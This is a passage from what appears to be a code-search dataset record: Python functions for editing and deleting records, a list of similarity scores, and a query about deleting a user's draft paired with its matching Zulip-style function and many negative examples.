database\n while True:\n rowid = self.validateRowid(rowid)\n if rowid is None:\n rowid = input('Enter member id: ')\n continue\n \n member = self.roster.get(rowid)\n if member is None:\n print(\"No member with id of %d\" % rowid)\n # rowid will get validated again, but it's the same value\n # which already passed validation\n continue\n \n break\n \n print('Editing %s %s' % (member.first, member.last))\n print('Type new value, hit enter to keep current value, or enter spaces to clear a value')\n member.first = self.getNewValue('First name', member.first)\n member.last = self.getNewValue('Last name', member.last)\n member.introducedDate = self.getNewValue('introduced date', member.introducedDate) \n \n self.roster.update(member)", "def update_user(user_id):\n new_dict = request.get_json(silent=True)\n if type(new_dict) is dict:\n user_obj = storage.get(\"User\", user_id)\n if user_obj is None:\n abort(404)\n for k, v in new_dict.items():\n if k not in [\"id\", \"email\", \"created_at\", \"updated_at\"]:\n setattr(user_obj, k, v)\n user_obj.save()\n return jsonify(user_obj.to_dict()), 200\n else:\n response = jsonify({\"error\": \"Not a JSON\"}), 400\n return response", "def podcast_edit(user_uid, podcast_id):\n 
parser_error = False\n user = get_authenticated_user()\n if user.uid != user_uid:\n raise Exception(\"Illegal access.\")\n\n if podcast_id is not None:\n podcast = Podcast.load(user.uid, podcast_id)\n else:\n podcast = None\n\n if request.method == \"POST\":\n url = request.form[\"url\"]\n podcast_type = request.form[\"podcast_type\"]\n\n if podcast is None:\n try:\n podcast = Podcast(user_uid=user.uid, podcast_type=podcast_type, url=url)\n podcast.initialize()\n except PodcastParserException as e:\n podcast = None # return to state prior to calling .initialize()\n parser_error = True\n else:\n podcast.save()\n return redirect(url_for(\"podcasts_list\"))\n else:\n try:\n podcast.url = url\n podcast.podcast_type = podcast_type\n podcast.initialize()\n except PodcastParserException as e:\n parser_error = True\n else:\n podcast.save()\n return redirect(url_for(\"podcasts_list\"))\n return render_template(\"podcast_edit.html\",\n podcast=podcast,\n podcast_types=PODCAST_TYPES,\n parser_error=parser_error)", "def update_item(self, xblock, user_id=None, allow_not_found=False, force=False):\r\n if xblock.location.category in DIRECT_ONLY_CATEGORIES:\r\n return super(DraftModuleStore, self).update_item(xblock, user_id, allow_not_found)\r\n\r\n draft_loc = as_draft(xblock.location)\r\n try:\r\n if not self.has_item(draft_loc):\r\n self.convert_to_draft(xblock.location)\r\n except ItemNotFoundError:\r\n if not allow_not_found:\r\n raise\r\n\r\n xblock.location = draft_loc\r\n super(DraftModuleStore, self).update_item(xblock, user_id, allow_not_found)\r\n # don't allow locations to truly represent themselves as draft outside of this file\r\n xblock.location = as_published(xblock.location)", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def update_user(user_id):\n update_usr = request.get_json()\n if not update_usr:\n abort(400, {'Not a JSON'})\n usr = storage.get(User, user_id)\n if not usr:\n abort(404)\n else:\n for key, value in update_usr.items():\n setattr(usr, key, value)\n storage.save()\n return jsonify(usr.to_dict())", "def modify_user(request, user_id):\n if request.method == 'POST':\n user = User.objects.get(id=user_id)\n form = ModifyUserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect(index)\n else:\n user = User.objects.get(id=user_id)\n form = ModifyUserForm(instance=user)\n\n return render(request, 'users/modify_user.html', {\n 'form': form,\n 'user_id': user_id,\n })", "def edit_entry(id):\n if not session.get('logged_in'):\n abort(401)\n\n if request.method == 'POST':\n db = get_db()\n db.execute('update entries set title = ?, ingredients = ?, \\\n steps = ?, tags = ?, url = ? where id = ?',\n [request.form['title'], request.form['ingredients'],\n request.form['steps'], request.form['tags'],\n request.form['url'], request.form['id']])\n db.commit()\n flash('Entry ' + id + ' has been modified.', 'success')\n return view_entry(str(id))\n else:\n db = get_db()\n cur = db.execute('select id, title, ingredients, steps, tags, \\\n url from entries where id = ? 
order by id desc',\n [id.strip()])\n entries = cur.fetchall()\n return render_template('edit_entry.html', entries=entries)", "def restaurants_edit(restaurant_id):\n # If the user isn't logged in, send to the login page\n if helper.handle_login(login_session) is False:\n return redirect('/login')\n # Find the restaurant\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n if request.method == 'POST':\n # Only edit if the entry was re-written\n if len(request.form['address']) > 0:\n restaurant.address = request.form['address']\n if len(request.form['phone']) > 0:\n restaurant.phone = request.form['phone']\n if len(request.form['web']) > 0:\n restaurant.web = helper.check_restaurant_URL(request.form['web'])\n if len(request.form['tag_line']) > 0:\n tag_line = request.form['tag_line']\n tag_list = tag_line.split(',')\n helper.delete_restaurant_tag_pairs(restaurant.id)\n for tag in tag_list:\n helper.add_tag_if_not_exists(tag, restaurant.id)\n if len(request.form['description']) > 0:\n restaurant.description = request.form['description']\n\n restaurant.last_update = datetime.utcnow()\n\n session.add(restaurant)\n session.commit()\n flash(\"Restaurant {} edited!\".format(restaurant.name))\n return redirect(url_for('restaurants_page'))\n else:\n # Get user info if the user is signed in to render edit form\n user_info = helper.get_user_if_exists(login_session)\n tag_rest_list = session.query(RestaurantTags).filter_by(restaurant_id=restaurant.id).all()\n tag_line = ''\n # Create a tag line - by compiling the string tag_name for each tag\n for pair in tag_rest_list:\n tag = session.query(Tags).filter_by(id=pair.tag_id).first()\n tag_line += tag.tag_name + ', '\n return render_template('editrestaurant.html',\n restaurant=restaurant,\n tag_line=tag_line,\n user_info=user_info)", "def save_draft_entry(title, content, request, id=None):\n if \"drafts\" not in request.session:\n request.session[\"drafts\"] = []\n\n if id is None:\n id = uuid.uuid4()\n\n else:\n # we are deleting the old one as an alternative to \"replacing\".\n delete_draft_by_id(request, id)\n\n wiki = {\n \"id\": f\"{id}\",\n \"title\": title,\n \"body\": content\n }\n request.session['drafts'] += [wiki]" ]
[ "0.63595945", "0.6280873", "0.623346", "0.62005955", "0.618698", "0.61712956", "0.616757", "0.6136594", "0.6136562", "0.61018544", "0.60939956", "0.60843796", "0.5883826", "0.58486557", "0.5807267", "0.57433337", "0.5733624", "0.5710894", "0.56908655", "0.56681085", "0.5636532", "0.5623547", "0.5588345", "0.5549195", "0.55424416", "0.5525518", "0.55219877", "0.5499191", "0.5493994", "0.54774994", "0.54753023", "0.5473692", "0.54623336", "0.54356134", "0.5401796", "0.53818357", "0.53565025", "0.53162456", "0.52937883", "0.5291551", "0.5285512", "0.5276801", "0.52740717", "0.5269071", "0.5241892", "0.52390003", "0.52205914", "0.5219559", "0.52192074", "0.52112454", "0.52081895", "0.52031314", "0.5202069", "0.5198901", "0.5197227", "0.51937515", "0.51841545", "0.5183425", "0.51826", "0.51789266", "0.51730865", "0.51690656", "0.51637363", "0.5158566", "0.5152604", "0.51514316", "0.5143821", "0.5130277", "0.5123523", "0.51172864", "0.51038504", "0.5090491", "0.508894", "0.5084592", "0.50827426", "0.5079641", "0.5077554", "0.5068214", "0.5065948", "0.5062085", "0.506061", "0.50534743", "0.5046808", "0.5042253", "0.504168", "0.50363636", "0.5032691", "0.5030787", "0.502486", "0.5023102", "0.5012522", "0.50111216", "0.5006359", "0.50062984", "0.50055736", "0.50055534", "0.50046563", "0.5002317", "0.49955454", "0.49919808" ]
0.7761259
0
Delete a draft belonging to a particular user.
def do_delete_draft(draft_id: int, user_profile: UserProfile) -> None:
    try:
        draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)
    except Draft.DoesNotExist:
        raise ResourceNotFoundError(_("Draft does not exist"))
    draft_id = draft_object.id
    draft_object.delete()
    event = {"type": "drafts", "op": "remove", "draft_id": draft_id}
    send_event(user_profile.realm, event, [user_profile.id])
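For context, a minimal caller sketch for this action; the wrapper name and return strings below are illustrative assumptions, not part of the original entry:

# Hypothetical caller: delete one of the user's drafts and report the outcome.
def handle_delete_draft(user_profile: UserProfile, draft_id: int) -> str:
    try:
        do_delete_draft(draft_id, user_profile)
    except ResourceNotFoundError:
        return "draft not found"  # the id does not belong to this user
    return "deleted"  # a "remove" event was already broadcast to the user's clients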
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def delete_draft(draft_uuid):\n api_request('delete', api_url('drafts', str(draft_uuid)))", "def delete(self,\n draft_id,\n ):\n return self._invoke('delete',\n {\n 'draft_id': draft_id,\n })", "def delete(self, user_id):\r\n return delete_user(request, user_id)", "def delete(self, user_id):\n return delete_user(user_id)", "def _delete_draft_message(draft):\n if draft is not None:\n draft.key.delete()\n return HttpTextResponse('OK')", "def delete_user(self, user):\n self.delete(user)", "def delete(self, user: 'UserCondensed'):\n self._delete(entity=user)", "def delete_drafts(request):\n query = models.Comment.query(\n models.Comment.author == request.user, models.Comment.draft == True,\n ancestor=request.issue.key)\n keys = query.fetch(keys_only=True)\n ndb.delete_multi(keys)\n request.issue.calculate_draft_count_by_user()\n request.issue.put()\n return HttpResponseRedirect(\n reverse(publish, args=[request.issue.key.id()]))", "def delete(user_id):\n assert isinstance(user_id, ObjectId)\n\n User.objects(id=user_id).delete()", "def delete_user(self, user):\n # noinspection PyUnresolvedReferences\n self.delete(user)", "def delete(user_id):\n # Get the user requested\n user = User.query.filter(User.user_id == user_id).one_or_none()\n\n if user is not None:\n db.session.delete(user)\n db.session.commit()\n return (\n \"User {user_id} deleted\".format(user_id=user_id), 200\n )\n\n else:\n abort(\n 404,\n \"Person not found for Id: {user_id}\".format(user_id=user_id),\n )", "def delete(self, user_id):\n\n user = User.objects.get_or_404(public_id=user_id)\n return user.delete()", "def delete(user_id: int):\n usr = get_by_id(user_id)\n if not usr:\n raise UserNotFound\n\n db.session.delete(usr)\n db.session.commit()", "def delete_user(self, user):\n self.execute(TABELLE['id_users'][\"delete\"], user[\"id\"])", "def delete_user():", "def delete_user(self, user_id):\n\n # ask the model to delete the user\n um = User(self.settings)\n status = um.delete(user_id)\n\n # return\n return status", "def DeleteDraft(host, change):\n path = _GetChangePath(change)\n try:\n FetchUrl(host, path, reqtype='DELETE', ignore_204=True, ignore_404=False)\n except GOBError as e:\n # On success, gerrit returns status 204; anything else is an error.\n if e.http_status != 204:\n raise\n else:\n raise GOBError(\n 200, 'Unexpectedly received a 200 http status while deleting draft %r'\n % change)", "def delete_user(self, user_id):\n sql = 'update account_user set is_deleted = 1 where id = %s'\n with connection.cursor() as cursor:\n cursor.execute(sql, [user_id])\n row = cursor.fetchone()\n\n return row", "def delete_item(self, id: str, user: User) -> bool:", "def delete_user():\n #TODO user delete\n pass", "def delete_user(self, user_name):\n user = self.get_user(user_name)\n return self.client.delete_resource(user.get('href'))", "def delete(self, user_id):\n user = User.query.get(user_id)\n \n if user is None:\n return abort(422, message=\"User does not exist\")\n \n # check if the user is an admin and is the only one\n admins = User.query.filter_by(admin=True).all()\n if user.id == get_jwt_identity() and len(admins) == 1:\n return abort(422, message=\"User is the only admin, there must be at least one admin in the system\")\n \n user.delete()\n \n return { 'message': \"User '{}' has been deleted\".format(user.id) }", "def delete_user(user_id):\n\n user = User.query.get(user_id)\n db.session.delete(user)\n db.session.commit()\n return", "def deleteUser(user):\n delete_user(user)\n return redirect(url_for('login'))", 
"async def delete_user(user_id):\n \n user = User.select().where(User.id == user_id).first()\n\n if not user:\n return HTTPException(404, 'User not found')\n else:\n user.delete_instance()\n\n return f\"User {user.username} deleted successfully\"", "def delete_state(self, user=None):\r\n if user:\r\n self.q(css='input[id^=sd_fu_]').fill(user)\r\n self.q(css='section.staff-modal a#staff-debug-sdelete').click()", "def get_delete(self, user_id):\n return self.post_delete(user_id)", "def delete(self, user_id):\n user = User.query.get(user_id)\n\n if user is None:\n return mk_response(\"User does not exist\", 422)\n\n # check if the user is an admin and is the only one\n admins = User.query.filter_by(admin=True).all()\n if user.id == get_jwt_identity() and len(admins) == 1:\n return mk_response(\"User is the only admin, there must \" +\n \"be at least one admin in the system\", 422)\n\n user.delete()\n\n return mk_response(\"User '{}' has been deleted\".format(user.id))", "def delete(self, request, user_id=None):\n data = json.loads(request.body.decode())\n authenticated = Account.check_credentials(request, data['email'], data['password'])\n user = {}\n user['account_id'] = authenticated.id\n\n if authenticated.check_admin(request, user):\n NLTKOutput.remove(request=request, pk=user_id)\n Account.remove(request=request, pk=user_id)\n return Response(json='Account and content deleted', status=204)\n\n return Response(json='Not Authorized', status=401)", "def delete_user(self, user_id):\n if self.database is None:\n raise Exception(\"No database.\")\n if user_id is None or len(user_id) == 0:\n raise Exception(\"Bad parameter.\")\n return self.database.delete_user(user_id)", "def delete_user(id):\n pass", "def delete(self, request, *args, **kwargs):\n thread = self.get_thread()\n if not thread:\n raise NotFound(code=status.HTTP_404_NOT_FOUND)\n\n thread.userthread_set.filter(user=request.user).update(deleted=True)\n return Response(status=status.HTTP_200_OK)", "def delete_user(user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect('/')", "def remove(self, user):\r\n url = '{0}/{1}'.format(self.get_url(), user)\r\n\r\n return http.Request('DELETE', url), parsers.parse_empty", "def userproject_post_delete(sender, instance, **kwargs):\n instance.document.delete(False)", "def delete_user(payload, user_id):\n user = User.query.get(user_id)\n # exception for non existing id\n if user is None:\n abort(404)\n # set error status\n error = False\n # delete the user\n try:\n user.delete()\n except Exception:\n user.rollback()\n error = True\n print(sys.exc_info())\n finally:\n user.close_session()\n\n if error:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'deleted': user_id\n })", "def delete_user(self, user_id):\n return self._delete('/users/{0}'.format(user_id))", "def delete(self, *args, **kwargs):\n if 'user' not in kwargs or not args:\n self.raise401()\n\n user = kwargs['user']\n path = parse_path(args[0])\n project = Project.objects(name=path[0], members__in=[user])\n if not project:\n self.raise401()\n try:\n project.delete()\n self.set_status(204)\n self.finish()\n except Exception as e:\n reason = e.message\n self.raise400(reason=reason)", "def delete_user(user_id):\n usr = storage.get(User, user_id)\n if usr:\n usr.delete(), storage.save()\n return {}\n else:\n abort(404)", "def delete(user: User) -> None:\n anonym_uid = DBDiscussionSession.query(User).filter_by(nickname=nick_of_anonymous_user).first().uid\n\n # authors\n 
authors = DBDiscussionSession.query(Issue).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(TextVersion).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(PremiseGroup).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(Premise).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(Argument).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(ReviewCanceled).filter_by(author_uid=user.uid).all()\n authors += DBDiscussionSession.query(RevokedContent).filter_by(author_uid=user.uid).all()\n for element in authors:\n element.author_uid = anonym_uid\n\n # reviews without ReviewSplitValues and ReviewMergeValues\n review_edit = DBDiscussionSession.query(ReviewEdit).filter_by(detector_uid=user.uid).all()\n review_edit_value = DBDiscussionSession.query(ReviewEditValue).filter(\n ReviewEditValue.review_edit_uid.in_([r.uid for r in review_edit])).all()\n reviews = DBDiscussionSession.query(ReviewDelete).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewOptimization).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewDuplicate).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewMerge).filter_by(detector_uid=user.uid).all()\n reviews += DBDiscussionSession.query(ReviewSplit).filter_by(detector_uid=user.uid).all()\n for element in reviews + review_edit + review_edit_value:\n element.detector_uid = anonym_uid\n\n # last reviewed elements\n last_reviewers = DBDiscussionSession.query(LastReviewerDelete).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerDuplicate).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerEdit).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerOptimization).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerSplit).filter_by(reviewer_uid=user.uid).all()\n last_reviewers += DBDiscussionSession.query(LastReviewerMerge).filter_by(reviewer_uid=user.uid).all()\n for element in last_reviewers:\n element.reviewer_uid = anonym_uid\n\n # revoked content\n rev_cntnt_hisy_old = DBDiscussionSession.query(RevokedContentHistory).filter_by(old_author_uid=user.uid).all()\n rev_cntnt_hisy_new = DBDiscussionSession.query(RevokedContentHistory).filter_by(new_author_uid=user.uid).all()\n for element in rev_cntnt_hisy_old:\n element.old_author_uid = anonym_uid\n for element in rev_cntnt_hisy_new:\n element.new_author_uid = anonym_uid\n\n DBDiscussionSession.query(ReputationHistory).filter_by(user=user).delete()\n DBDiscussionSession.query(SeenStatement).filter_by(user=user).delete()\n DBDiscussionSession.query(SeenArgument).filter_by(user_uid=user.uid).delete()\n DBDiscussionSession.query(History).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(Settings).filter_by(user=user).delete()\n DBDiscussionSession.query(StatementReference).filter_by(author=user).delete()\n DBDiscussionSession.query(ClickedArgument).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(ClickedStatement).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(MarkedArgument).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(MarkedStatement).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.query(Message).filter_by(from_author_uid=user.uid).delete()\n 
DBDiscussionSession.query(Message).filter_by(to_author_uid=user.uid).delete()\n DBDiscussionSession.query(User).filter_by(uid=user.uid).delete()", "def can_delete(self, user):\n raise Return(False)", "def delete_user_process(user_id):\n\n db_user = User.query.get_or_404(user_id)\n\n db.session.delete(db_user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_user(self, user):\n try:\n with dbm.open(self.dbm_path, 'c', 0o600) as db:\n del db[user.name]\n except KeyError as k:\n pass", "def test_delete(self):\n thread = self.create_thread()\n ut = UserThread.objects.get(\n user=thread.recipients.first(), thread=thread)\n ut_id = ut.pk\n ut.delete()\n ut = UserThread.objects.with_deleted().get(pk=ut_id)\n self.assertEqual(ut.status, 'deleted')", "def delete_user(user_id):\n\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_user(self, user):\n name = utils.get_name(user)\n self._user_manager.delete(name)", "def delete_post(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n\n db.session.delete(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}')", "def delete_user(self, user):\n # type: (dict) -> dict\n self.request_url = \"{0}/{1}/{2}\".format(self.API_URL, self.USER_ENDPOINT, user['id'])\n return self.__create_request(payload=user, request_type=self.REQUEST_DELETE, version=\"v1\")", "def delete_user(user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def delete_hotdesk(self, account_id, user_id):\n return self.rest_request.delete('accounts/' + str(account_id) +\n '/users/' + str(user_id) + '/hotdesks')", "def remove(self, user_id):\n pass", "def desvinculacionComite(request,pk,pk_user):\n instanceUser = Comite.objects.filter(id_proyecto = pk, id_user = pk_user)\n instanceUser.delete()", "def delete_user(self, _id):\n return self.make_request(\"DELETE\", \"users/\"+_id, {})", "def user_id_delete(user_id):\n user = storage.get(\"User\", user_id)\n\n if user is None:\n abort(404)\n user.delete()\n del user\n return make_response(jsonify({}), 200)", "def delete_user(user_id):\n netAdminToolDB = app.config['DATABASE']\n user = netAdminToolDB.get_user(user_id)\n\n if user == None:\n return jsonify({'error': 'User_id not found'}), 404\n\n netAdminToolDB.delete_user(user_id)\n return jsonify({'result': True})", "def delete_user(self, userId):\n\n try:\n query = \"delete from user where userId = {}\".format(userId)\n print(query)\n cur = self.con.cursor()\n cur.execute(query)\n self.con.commit()\n\n logger.info(\"Deleted\")\n except Exception as e:\n logger.error(\"Error occured at data deletion..\", e)", "def delete(self):\n\n user_id = get_jwt_identity()\n user = user_crud.get(user_id)\n if not user:\n abort(404, message=\"User not Found\")\n all_tokens = auth_crud.get_user_tokens(user_id)\n tokens = [token.to_dict() for token in all_tokens]\n for token in tokens:\n auth_crud.revoke_token(token['id'], user_id)\n user = user_crud.remove(user_id)\n\n return {'msg': 'User Removed'}", "def remove_draft(self, account, uuid):\n account = Account(account, hive_instance=self.hive)\n return self._conveyor_method(account, None,\n \"conveyor.remove_draft\",\n [account['name'], uuid])", "def delete(self, user):\n q = \"DELETE FROM profiles WHERE user=?\"\n try:\n self._query(q, (user,), fetch='none')\n except Exception as e:\n raise e", "def _delete_user(self, user):\n if User.delete_user(user):\n 
self.session.output({'deleted': 'user {} and their related accounts'.format(user)})\n return True\n else:\n self.session.output({'invalid_user': 'please enter valid user ID!\\n'}, '[ Fail to delete user ]')\n return False", "def delete(self):\n return self._router_request(\n self._make_request_data(\n 'deleteUserCommand',\n data=dict(\n uid=self.parent,\n id=self.id\n )\n )\n )", "def _delete(self, pk, user=None):\n request = self.factory.delete(self.detail_url(pk), format='json')\n force_authenticate(request, user)\n resp = self.detail_view(request, pk=pk)\n resp.render()\n return resp", "def delete(self,user_id):\n user_status,calling_user = has_admin_privileges()\n if user_status == \"no_auth_token\":\n return (bad_request,400,headers)\n\n if user_status == \"not_logged_in\":\n return (unauthorized,401,headers)\n\n # getting the user. Assuming the user exists. Case of user not existing is checked below\n try:\n user = g.session.query(g.Base.classes.users).get(user_id)\n except Exception as err:\n print(type(err))\n print(err)\n return (internal_server_error,500,headers)\n\n # *Only Directors, Organizers and user calling the request\n if user:\n try:\n if user_status in [\"director\",\"organizer\"] or calling_user.id == user.id:\n if user.rsvps_collection:\n g.session.delete(g.session.query(g.Base.classes.rsvps).get(user.rsvps_collection[0].id))\n if user.applications_collection:\n g.session.delete(g.session.query(g.Base.classes.applications).get(user.applications_collection[0].id))\n g.session.delete(g.session.query(g.Base.classes.users).get(user_id))\n else:\n forbidden[\"error_list\"]={\"Authorization error\":\"You do not privileges to access this resource. Contact one of the organizers if you think require access.\"}\n return (forbidden,403,headers)\n except Exception as err:\n print(type(err))\n print(err)\n return (internal_server_error, 500, headers)\n else:\n return (not_found,404,headers)\n\n # error handling for mail send\n try:\n f = open(\"common/account_creation.html\",'r')\n body = Template(f.read())\n f.close()\n body = body.render(first_name = user.first_name)\n send_email(subject = \"Account creation confirmation!\",recipient = user.email, body = \"Account deleted!\")\n return (\"\",204,headers)\n except Exception as err:\n print(type(err))\n print(err)\n internal_server_error[\"error_list\"][\"error\"] = \"Account successfully created. Error in confirmation email sending.\"\n return (internal_server_error,500,headers)", "def remove_admin(self, project_id, user_id):\n current_user = request.environ.get('repoze.who.identity')['user']\n user = controller_globals._get_user_from_email(current_user.email)\n\n # make sure we're actually the project lead\n if not self._current_user_leads_review(project_id):\n return \"<font color='red'>tsk, tsk. 
you're not the project lead, %s.</font>\" % user.fullname\n\n leader_to_remove = Session.query(model.User).filter_by(id=user_id).one()\n review = self._get_review_from_id(project_id)\n review.leaders.remove(leader_to_remove)\n Session.add(review)\n Session.commit()\n\n redirect(url(controller=\"review\", action=\"admin\", project_id=project_id))", "def apply_deletion_policy(cls, user_id: str) -> None:\n keys = cls.query(datastore_services.any_of(\n cls.recipient_id == user_id,\n cls.sender_id == user_id,\n )).fetch(keys_only=True)\n datastore_services.delete_multi(keys)", "def team_user_delete(token_user, team_id, user_id):\n team = Team.query.get(team_id)\n if team is None:\n abort(404, 'team not found')\n\n if len(team.members) == 1:\n abort(400, 'only one member on team -- use team delete instead')\n\n # check for permissions to delete the team\n if not (token_user.has_permission('team.update.elevated') or\n (token_user.has_permission('team.update') and\n team.has_member(token_user))):\n abort(403, 'insufficient permissions to delete user from team')\n\n user = User.query.get(user_id)\n if user is None:\n abort(400, 'invalid user id')\n\n user.teams.remove(team)\n get_db().commit()\n\n return '', 204", "def delete_user(self) -> 'outputs.ActingUserResponse':\n return pulumi.get(self, \"delete_user\")", "def delete_item(self, item_id, user_id):\r\n item = self._db_manager.get_item(item_id)\r\n if item is None:\r\n flash(\"Invalid item.\")\r\n return\r\n if item[\"user_id\"] != user_id:\r\n flash(\"Only the original creator can delete an item.\")\r\n return\r\n flash(self._db_manager.delete_item(item_id))", "def delete_user(self):\n\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(self):\n User.user_list.remove(self)", "def delete_user(user_id):\n temp = models.storage.get('User', user_id)\n if temp is None:\n abort(404)\n temp.delete()\n models.storage.save()\n return jsonify({})", "def user_delete(user_id):\n user = storage.get('User', user_id)\n if user is None:\n abort(404)\n user.delete()\n storage.save()\n return jsonify({}), 200", "def delete(self, user):\r\n if user.is_authenticated() and self.author == user:\r\n post = self.post\r\n super(Comment, self).delete()\r\n cache_bust([('comments', post.pk)])\r\n return post\r\n return False", "def delete_user_entitlement(self, user_id):\n route_values = {}\n if user_id is not None:\n route_values['userId'] = self._serialize.url('user_id', user_id, 'str')\n self._send(http_method='DELETE',\n location_id='8480c6eb-ce60-47e9-88df-eca3c801638b',\n version='6.0-preview.3',\n route_values=route_values)", "def user_delete(user_id=None):\n obj = storage.get(\"User\", user_id)\n if obj is None:\n abort(404)\n storage.delete(obj)\n storage.save()\n return jsonify({}), 200", "def delete_user(id_user: int):\n mycursor.execute(f\"\"\"DELETE FROM User\n WHERE id_user = {id_user}\"\"\")\n mydb.commit()\n return f\"L'utilisateur {id_user} a été supprimé\"", "def delete_user(user_id=None):\n obj = storage.get('User', user_id)\n if obj is None:\n abort(404)\n else:\n storage.delete(obj)\n storage.save()\n return jsonify({}), 200", "def delete(self, user):\r\n if user.is_authenticated() and self.author == user:\r\n if self._handle_removed_media():\r\n Timeline.objects.remove_from_timeline(instance=self, user=user)\r\n super(Post, self).delete()\r\n cache_bust([('posts_timeline', user.pk), ('comments', self.pk)])\r\n return True\r\n return False", 
"def test_delete_useruser_uuid_post(self):\n pass", "def delete_user(id):\n user = Users.query.filter_by(id=id).first()\n user.delete()\n if not user:\n return send_msg(404, 'Not Found')\n return send_msg(204, \"No data\")", "def delete_by(self, user):\n if user.is_superuser or user is self.added_by:\n self.delete()", "def delete_in_database(user: User) -> True:\n DBDiscussionSession.query(History).filter_by(author_uid=user.uid).delete()\n DBDiscussionSession.flush()\n return True", "def delete_user(user_id):\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({}), 200", "def delete_user_calendars(user_id):\n with session_scope(DBSession) as session:\n calendar_ids_to_delete = session.query(CalendarId).filter(\n CalendarId.user_id == user_id).all()\n\n if calendar_ids_to_delete: # user has atleast one calendar\n for calendar_id in calendar_ids_to_delete:\n session.delete(calendar_id)", "def delete(self):\n self.deleted = True\n # Deactivate the user to disallow authentication and also\n # to let the user verify the email again after recovery.\n self.is_active = False\n self.save()\n self.history.create(user_id=self.pk, action=user_history.DELETION)", "def delete_user(user_id=None):\n\n user = storage.get(\"User\", user_id)\n if user is None:\n abort(404)\n else:\n storage.delete(user)\n storage.save()\n return jsonify({}), 200", "def delete_user(request):\n user_id = request.POST.get('user_id')\n User.objects.filter(id=user_id).delete()\n response = {'status': 1, 'status_message': 'Success'}\n return HttpResponse(json.dumps(response))", "def test_delete_post_by_user(self):\n\n response = self.client.delete(reverse('api:posts-detail', kwargs={'pk': self.post1.id}))\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def delete(self, user_id):\n res = self._user.delete_user(user_id)\n\n if res:\n return {\n \"status\": 200,\n \"data\": [{\n \"id\": res[\"id\"],\n \"message\": \"user record has been deleted\"\n }]\n }, 200\n else:\n return {\n \"status\": 404,\n \"error\": \"Not found for id {}\".format(user_id)\n }, 404", "def review_delete_handler(review_id, user):\n review = Review.query.get_or_404(str(review_id))\n if review.is_archived is True:\n raise NotFound\n if review.user_id != user.id:\n raise AccessDenied\n review.delete()\n return jsonify(message='Request processed successfully')", "def delete_user(self) -> None:\n table_dictionary = {\n 'Apple': {\n 'table': 'AppleReceipts',\n 'user_id': 'User_id'\n },\n 'ESL': {\n 'table': 'ESLReceipts',\n 'user_id': 'User_id'\n },\n 'Transactions': {\n 'table': 'Transactions',\n 'user_id': 'User_id'\n },\n 'Users': {\n 'table': 'Users',\n 'user_id': 'id'\n },\n }\n\n # delete the current user's information from the db.\n for key in table_dictionary:\n query = f\"\"\"\n DELETE\n FROM {table_dictionary[key]['table']}\n WHERE {table_dictionary[key]['user_id']}=?;\n \"\"\"\n self.db.commit(query, values=(self.id,))\n\n # perform a sign out\n self.sign_out()\n\n log(f\"User:{self.id} has deleted their account.\")", "def delete_user_by_id(user_id):\n return woo_request_helper().delete_details(wc_endpoint='customers/{}'.format(user_id))", "def deleteUser(self,name):\n raise BorkedDeleteUser", "def delete_user_async(self, user):\n # type: (dict) -> dict\n self.request_url = \"{0}/{1}/{2}\".format(self.API_URL, self.USER_ENDPOINT, user['id'])\n return self.__create_request(payload=user, request_type=self.REQUEST_DELETE, version=\"v2\")", "def 
del_user_id(user_id):\r\n obj = storage.get(User, user_id)\r\n if obj is None:\r\n abort(404)\r\n obj.delete()\r\n storage.save()\r\n return jsonify({}), 200", "def delete_user(user_id):\n user_obj = storage.get(\"User\", user_id)\n if user_obj:\n storage.delete(user_obj)\n storage.save()\n return jsonify({}), 200\n else:\n abort(404)", "def delete_user():\r\n raise NotImplementedError()", "def delete_user(self, instance, name):\n return instance.delete_user(name)" ]
